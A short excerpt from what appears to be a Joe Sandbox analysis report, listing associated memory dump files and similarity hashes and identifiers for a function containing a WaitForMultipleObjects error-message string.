                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                                • API String ID: 564652978-2248577382
                                                                                                                                                                                                                                • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                • Instruction ID: 36664ab1982edc3abb4703c617b5a6a1e618847335effe3dfa303e5996c69b8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E04F22E1890282E740A724EC820753351AF657B4F9007B0D03EC26E5BF3DA55F8301